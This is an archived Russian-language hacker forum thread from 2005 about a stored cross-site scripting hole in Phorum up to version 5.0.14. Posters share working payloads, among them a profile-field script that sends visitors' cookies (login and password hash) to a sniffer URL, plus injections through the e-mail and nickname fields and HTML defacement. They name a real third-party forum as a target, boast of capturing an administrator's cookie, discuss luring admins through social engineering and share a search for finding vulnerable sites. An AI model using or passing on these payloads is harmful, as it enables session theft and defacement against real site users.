Просмотр полной версии : XSS в Phorum<=5.0.14
tester2005
16.03.2005, 10:28
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно:)
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. :)
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)
Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:)
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
White Jordan
16.03.2005, 11:16
Ну давай ссылку что нам гадать в чём проблема чтоли?
White Jordan
16.03.2005, 15:54
Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.
PinkPanther
16.03.2005, 15:59
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Я эту фишку уже как 2 недели назад просек.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно:)Теперь как можно употребить на других,
В поле Real Nаme вставим:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. :)
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:)
Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.
PinkPanther
16.03.2005, 16:01
Если никто не против, на днях сделаю видео.
White Jordan
16.03.2005, 16:01
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
PinkPanther
16.03.2005, 16:09
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
Ну возьми этот к примеру: http://www.recipe.ru/forum/
tester2005
16.03.2005, 18:20
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??
Если никто не против, на днях сделаю видео.
а кто против?, античату да и всем наоборот лучше :)
Ну и форум... Что это за форум на котором можно ставить <script>
tester2005
16.03.2005, 21:00
Ну и форум... Что это за форум на котором можно ставить <script>
бывает..;)
эх, был бы выход куки подделать..
PinkPanther
16.03.2005, 22:53
Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??
Извиняюсь, немного провтыкал. А штука там такя, проверки в подписи нет только когда смотришь профайл, при посте же, вводится проверка на <>, так что внедрение скрипта в подпись в данном случае не прокатит.
Беру свои слова назад, без просмотра жертвой профайла ничего не выйдет.
Кстати, в phorume присутствуют bb теги, эт. так, для размышлений.....
А насчет видео, в принципе всё и так понятно, но если есть потребность......будет и предложение.
PinkPanther
17.03.2005, 00:00
CyberLords Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)
Прикинь, доснял видео, заархивировал, думаю загляну ещё раз в лог сниффа, а уменя там админ уже сидит, гы-гы, даже никакой СИ не понадобилось, просто пиши в строке подписи FUCKING USA!!! и все.
Вобщем сплошной ЛОЛ.
В этом форуме есть ещё уязвимости xss
PinkPanther
17.03.2005, 00:39
Давеча ковырялся в старенькой версии phorum, несмотря на старость её можно найти на просторах инета оч. легко, и наткнулся на такой баг. При анонимном ответе, в поле Your E-mail: вставляю gates@microsoft.com"><script>alert('')</script> и пока кто-нить после меня не оставит сообщение, все ловят алерт.=)
p.s. KEZ, где ты ещё нашел, не в bb ль тегах?
White Jordan
17.03.2005, 01:30
Короче просто дайте мне ссылку на форум Я там хочу баги найти.
Morph"><script>alert('Morph Forever')</script> это еще в поле ник проходит =)
Тока я зайти не могу еще чтонить поищем ))
Все работает всем алерты раздал зашибись ))
Дыра Большая одна одним словом
White Jordan
17.03.2005, 07:40
Млрф дай ссылку где ты это зделал.
в поисковике найди я так нашел и не запоминал
И Я не Млрф!!!!! :mad: :mad: :mad:
White Jordan
17.03.2005, 07:45
Ну ты как икал? Дай точные слова в гуле которые ты встовлял.
KissMyASSBABY"><font color=red size=30>HACKED BY MORPH</font> Вот так тоже прикалыватся можно ))Везде проходит =))
http://www.google.com/search?q=Phorum&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8
На Жорик держи.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot